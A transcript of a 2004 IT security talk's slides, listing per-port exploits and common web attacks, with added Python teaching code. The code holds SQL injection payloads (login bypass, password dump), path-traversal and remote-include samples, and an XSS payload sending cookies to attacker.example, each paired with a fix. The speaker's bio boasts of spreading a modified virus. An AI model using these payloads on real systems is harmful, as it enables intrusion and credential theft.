Sembang2 Keselamatan It 2004


Description: Sembang2 Keselamatan IT 2004 ("IT Security Chit-Chat 2004"): Pokleyzz, wyse, obelicks, pengalir; by SK from SCAN Associates

Transcript of Sembang2 Keselamatan It 2004

Page 1: Sembang2 Keselamatan IT 2004

Sembang2 Keselamatan IT ("IT Security Chit-Chat")

[email protected] at scan-associates.net

Page 2: Speaker

• Call me S.K.
• While in UTM:
  – Modified virus source code and spread it to Tar College; cracked Virus Buster™ for fun
• After UTM:
  – Started up SCAN Associates
  – Legally do pen-tests for many agencies
  – Document hacking tricks and share them with friends

Page 3: Publications

• SQL Injection Walkthrough, published on more than a dozen security web sites
• Win32 Buffer Overflow Walkthrough, which details the process of a buffer overflow
• Thanks from Microsoft™ for finding a bug in their software
• Creating firewall-proof shellcode, presented at Blackhat and soon at the Ruxcon conference
• Winner of the Blackhat hacking game!

Page 4: What we wanna do today?

• Appetizer has:
  – some new terminology
  – a bit of concepts
  – a few easy-to-use tools
• Main course:
  – Threat
  – Vulnerability
  – Exploitation
  – A bit of SQL injection
• Dessert:
  – demo of some tricks/tools

TOC

Page 5: Threat

• If there is a computer, there is a threat…
• If there are 2 computers, there are 2 times the threats…
• If there are N computers, there are N × the threats…
• The more computers you have to manage, the more risk there is…

Threat

Page 6: Threat, seriously…

• Running background services:
  – Services running all the time
  – Allow direct connections from anywhere
  – Favorite targets:
    • HTTP (port 80)
    • FTP (port 21)
    • NetBIOS/SMB and RPC (ports 135, 445)
    • HTTPS (port 443)
    • SSH (port 22), etc.

Threat

Page 7: More threats…

• Mistakes and configuration errors:
  – No password
  – User name = password
  – Write access allowed
  – Default public/private SNMP community strings
  – Poor access control in the proxy server
  – Testing server on a public network
  – Existence of default accounts

Threat

Page 8: Threats from within…

• End-user attacks:
  – Email attachments
  – User downloads a trojan horse
  – File-sharing tools like Kazaa
  – Not to mention Instant Messaging and IRC
  – Unprotected Wi-Fi access points

Threat

Page 9: Vulnerability

• A software bug leads to a vulnerability; a vulnerability leads to a system hack
• Thus, the software bug is our friend
• Find the bug and you will find the way in
• Fortunately for us, security experts publish new vulnerabilities every day
• Our objective is to find a system with any vulnerability

Vulnerability

Page 10: Finding vulnerability

• The easy way:
  – nessus – general-purpose vulnerability scanner
  – nikto – web attack scanner
• The semi-automatic approach:
  – nmap – port scanner
  – sl (Foundstone ScanLine) – port scanner for windoze
• The free-styler:
  – netcat
  – your favorite browser

Vulnerability

Page 11: nessus

• General-purpose vulnerability scanner
• http://www.nessus.org
• GNU General Public License
• Tests hundreds of vulnerabilities effortlessly
• Can write your own plug-ins using NASL (the Nessus Attack Scripting Language)
• Test only: it will not let you control the server

Vulnerability - The easy way

Page 12: nessus client-server

(Diagram: a Nessus client, on Unix or on Windows, connects to the Nessus server on Unix; it is the server that scans the targets.)

Vulnerability - The easy way

Page 13: nikto

• Web scanner
• http://www.cirt.net/code/nikto.shtml
• Open source (GPL)
• Over 2600 checks for vulnerabilities specific to the Web only
• Supports HTTPS connections, which also keeps the checks out of sight of an IDS watching plaintext traffic
• Test only: it will not let you control the server

Vulnerability - The easy way

Page 14: Other tools

• General-purpose scanners:
  – ISS Internet Scanner (www.iss.net)
  – eEye's Retina (www.eeye.com)
• Web server scanners:
  – Stealth HTTP Scan (www.hideaway.net)
  – Whisker (www.wiretrip.net/rfp/p/doc.asp/i2/d21.htm)

Vulnerability - The easy way

Page 15: Port scanner

• Tells you what type of services are running on a server
• Indirectly tells you the OS too (from the pattern of open ports and the banners behind them)
• nmap
  – www.insecure.org/nmap/
  – Versatile port scanner for *nix
• sl
  – www.foundstone.com
  – easy-to-use port scanner for windoze

Vulnerability - semi-automatic

Page 16: Favorite targets

• Port 53 – try BIND exploits
• Port 21 – try anonymous login, simple passwords, or exploits for ProFTPD, wu-ftpd, Serv-U, etc.
• Port 22 – try simple passwords and the x2 exploit
• Port 25 – sendmail exploit for Slackware, or the Exchange exploit
• Port 80 – Apache chunked bug, IIS .printer, Unicode, ASP chunked, WebDAV, FrontPage, etc.
• Ports 135, 445 – try NetBIOS sharing with simple passwords, or the Locator, DCOM, Messenger, Workstation, LSASS exploits
• Port 443 – SSL-too-open, THCIISSLame.c
• Ports 1433, 1434 – MS SQL Server Resolution bug, Hello bug, or SA without a password

Vulnerability - semi-automatic

Page 17: Free styler

• Using netcat to connect to popular services and backdoor ports:
  – port 22: review the SSH version banner
  – port 1080: a SOCKS proxy might allow you to connect to internal IPs
  – port 5554: a worm backdoor port that might drop you a shell
• Use your favorite browser to surf around the target web server, looking for:
  – Hidden info in the HTML code
  – Web attacks via SQL injection, PHP, Perl, etc.

Vulnerability

Page 18: Exploitation

• The process of taking advantage of a vulnerability to either:
  – Get a shell (and thus control the victim)
  – Retrieve/modify information (source code, files, database)
  – Denial of Service (DoS), etc.
• To get an exploit:
  – Find/trade it from the web, IRC or friends
  – Create it yourself
  – Purchase it, as part of Core Impact or CANVAS

Exploitation

Page 19: Find it on the Internet

• www.metasploit.com
• Bugtraq mailing list
• Full Disclosure mailing list
• http://packetstormsecurity.nl/
• http://www.security.nnov.ru/search/exploits.asp
• IRC channels: #vuln, #badcode, #darknet, #phrack

Exploitation

Page 20: Creating it yourself

• Read and understand the vulnerability from the advisory:
  – www.securitytracker.com
  – www.microsoft.com/security
• Might require different skill sets:
  – Perl/PHP/SQL
  – Reverse engineering
  – C or ASM programming, etc.

Exploitation

Page 21: metasploit

• www.metasploit.com
• Developed by HD Moore and a few ghettohackers (they won the Defcon CTF 3 times in a row)
• Integrates many exploits in one easy-to-use package
• Supports command-line and web interfaces
• Packed with many useful components for exploit development
• It's free!

Exploitation

Page 22: Web attack

• Developers are putting more and more functionality into the Web (port 80)
• There are many types of attack specific to port 80 alone:
  – SQL injection
  – Perl and CGI insecurities
  – PHP insecurities
  – Cross-site scripting (XSS)

Web attack

Page 23: SQL injection

• A technique to manipulate data in a way that changes the original SQL statement
• It can happen in the following manner:
  – The program takes your input as a variable
  – It appends your input into an SQL statement
  – The program then passes the statement to the database

Web attack

Page 24: …SQL injection

• What if your input is an SQL command?
• By carefully inserting SQL commands as your input, you can change the original SQL statement into something else and make the database execute your command
• Usual tests for SQL injection:
  – Type a single quote (') as input; a database error back means the quote reached the statement unescaped
  – Type " union select 1" to see if injection is possible

Web attack
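The three-step pattern from page 23 and the two probes from page 24, as an added example written for this page (not code from the talk or from SCAN Associates). `login_vulnerable` appends the input into the statement exactly as described; `login_safe` is the same query with bound parameters. The in-memory SQLite table, its two users and their passwords are constructed data. Beyond the slide's two probes, the example also carries the injection through to what they lead to: a login bypass and a dump of the password column via UNION.

```python
import sqlite3


def make_demo_db():
    """In-memory user table standing in for the web application's database (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "admin", "s3cret"), (2, "sk", "letmein")])
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """The pattern the slide describes: the input is appended into the statement as text.
    Returns the matching user ids, or the database's error text (the single-quote
    test is looking for exactly that error)."""
    sql = ("SELECT id FROM users WHERE name = '" + username +
           "' AND password = '" + password + "'")
    try:
        return [row[0] for row in conn.execute(sql)]
    except sqlite3.Error as exc:
        return "error: %s" % exc


def login_safe(conn, username, password):
    """Same query with bound parameters: the input is data, never part of the statement."""
    sql = "SELECT id FROM users WHERE name = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (username, password))]


def run_injection_tests(conn):
    """The slide's two probes, plus two payloads that build on them, against both versions.
    Each value is (result from login_vulnerable, result from login_safe)."""
    probes = {
        "quote": ("'", "x"),                                   # breaks the statement -> error
        "union": ("x' UNION SELECT 1 --", "x"),                # page 24's 'union select 1'
        "bypass": ("admin' --", "wrong"),                      # comments out the password check
        "dump": ("x' UNION SELECT password FROM users --", "x"),  # reads another column
    }
    return {name: (login_vulnerable(conn, u, p), login_safe(conn, u, p))
            for name, (u, p) in probes.items()}


if __name__ == "__main__":
    db = make_demo_db()
    for name, (vuln, safe) in run_injection_tests(db).items():
        print("%-7s vulnerable=%r  safe=%r" % (name, vuln, safe))
```

The `--` payloads work because everything after the comment marker, including the rest of the original WHERE clause, is ignored by the database; the `union select 1` probe only succeeds when the attacker's column count matches the original query's, which is why the slide suggests it as the second test after the quote.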

Page 25: Perl & CGI

• File access problem
• The user supplies a variable which is in turn used by Perl/CGI to open a file
• Manipulating this variable may allow you to open any file, or even get remote execution

Web attack

Page 26: PHP

• Just like Perl/CGI, only more powerful (in the hacking sense)
• Not only can you manipulate the variable to open any file, you can also make it open any file on the Internet

Web attack
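Pages 25 and 26 describe the same bug from the defender's side: a script opens whatever file name the user hands it. The following is an added example written for this page (not code from the talk) of the check such a script should make before opening anything, with one test per trick the two slides allude to: `../` climbing out of the document root, an absolute path, the NUL byte that truncates the name in C-string APIs, the pipe and leading `<`/`>` that Perl's two-argument open() treats as a command, and the `http://` name that PHP's URL wrappers would fetch from the Internet. `DOC_ROOT`, the function names and the sample names are hypothetical.

```python
import posixpath
from urllib.parse import urlsplit

# Hypothetical document root the script is allowed to serve files from.
DOC_ROOT = "/var/www/docs"


def rejection_reason(doc_root, user_supplied):
    """Why a user-supplied file name must not be opened, or None if it is acceptable.
    Each check corresponds to one trick the Perl/CGI and PHP slides allude to."""
    if "\x00" in user_supplied:
        # Perl/PHP hand a C string to open(); "secret.txt\0.html" would be opened as "secret.txt"
        return "embedded NUL byte"
    stripped = user_supplied.strip()
    if not stripped:
        return "empty name"
    if "|" in stripped or stripped.startswith(("<", ">", "+")):
        # Perl's two-argument open("|cmd") / open("cmd|") runs a command instead of reading a file
        return "shell metacharacter"
    if urlsplit(stripped).scheme.lower() in ("http", "https", "ftp"):
        # PHP include()/fopen() with URL wrappers on: the 'any file on the Internet' case
        return "remote URL"
    resolved = posixpath.normpath(posixpath.join(doc_root, stripped))
    root = doc_root.rstrip("/")
    if resolved != root and not resolved.startswith(root + "/"):
        # ../ climbing out of the root, or an absolute path that makes join() drop the root
        return "escapes document root"
    return None


def resolve_document(doc_root, user_supplied):
    """Return the absolute path the script may open, or None if the name was rejected."""
    if rejection_reason(doc_root, user_supplied) is not None:
        return None
    return posixpath.normpath(posixpath.join(doc_root, user_supplied.strip()))


# Constructed sample inputs: one benign name and one per trick.
SAMPLES = [
    "manual/index.html",
    "../../../etc/passwd",
    "/etc/passwd",
    "manual/index.html\x00.txt",
    "ls -la |",
    "http://evil.example/shell.txt",
]

if __name__ == "__main__":
    for name in SAMPLES:
        reason = rejection_reason(DOC_ROOT, name)
        print("%-32r -> %s" % (name, reason or resolve_document(DOC_ROOT, name)))
```

The order matters: the NUL check runs before anything else because a truncated name would defeat the later string checks, and the root check is done on the normalised path rather than by looking for `..` in the input, so `manual/../../../etc/passwd` is caught the same way as the plain form.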

Page 27: XSS

• Allows injection of HTML code (including JavaScript/VBScript) into an existing HTML page
• If a user opens the page, your code executes in their browser
• Best used in forums, to steal user cookies

Web attack
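The forum case from page 27, as an added example written for this page (not code from the talk): the same post template rendered once with the user's text dropped straight into the page and once HTML-escaped, a crude check a reviewer can run over the rendered output for live script tags or `on*=` handlers, and the HttpOnly cookie flag that keeps the session cookie out of `document.cookie` even where escaping has been missed. The two payloads, the template and the cookie name are constructed for illustration.

```python
import html
import re

# Constructed attacker payloads of the kind posted to a forum; not taken from any real site.
COOKIE_THIEF = '<script>document.location="http://attacker.example/c?"+document.cookie</script>'
IMG_HANDLER = '<img src="x" onerror="alert(document.cookie)">'

# A live <script> tag, or an on*= event handler attribute inside some tag.
ACTIVE_CONTENT_RE = re.compile(r"<script\b|<\w+[^>]*\son\w+\s*=", re.IGNORECASE)


def render_post_vulnerable(author, body):
    """Forum post rendering as the slide describes it: the user's text goes into the page as-is."""
    return '<div class="post"><b>%s</b><p>%s</p></div>' % (author, body)


def render_post_safe(author, body):
    """Same template, but every user-controlled value is HTML-escaped so it stays text."""
    return '<div class="post"><b>%s</b><p>%s</p></div>' % (
        html.escape(author, quote=True), html.escape(body, quote=True))


def contains_active_content(markup):
    """Does the rendered page contain a live script tag or an on*= handler attribute?
    Escaped text such as '&lt;script&gt;' is harmless and is not matched."""
    return ACTIVE_CONTENT_RE.search(markup) is not None


def session_cookie_header(session_id):
    """The cookie the slide says XSS is used to steal. HttpOnly keeps it out of
    document.cookie in browsers that honour the flag, which blunts the cookie-theft
    payload even when a template somewhere forgets to escape."""
    return "Set-Cookie: sid=%s; Path=/; HttpOnly" % session_id


if __name__ == "__main__":
    for payload in (COOKIE_THIEF, IMG_HANDLER):
        for label, render in (("vulnerable", render_post_vulnerable), ("safe", render_post_safe)):
            page = render("bob", payload)
            print("%-10s active=%-5s %s" % (label, contains_active_content(page), page))
    print(session_cookie_header("abc123"))
```

Note that the author field is escaped too: the slide's "existing HTML page" includes every spot where user data is reflected, not just the post body, and the regex check is only a review aid, not a filter to ship (escaping on output is the fix).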

Page 28: Can we go now?

• Q & A session
• Thanks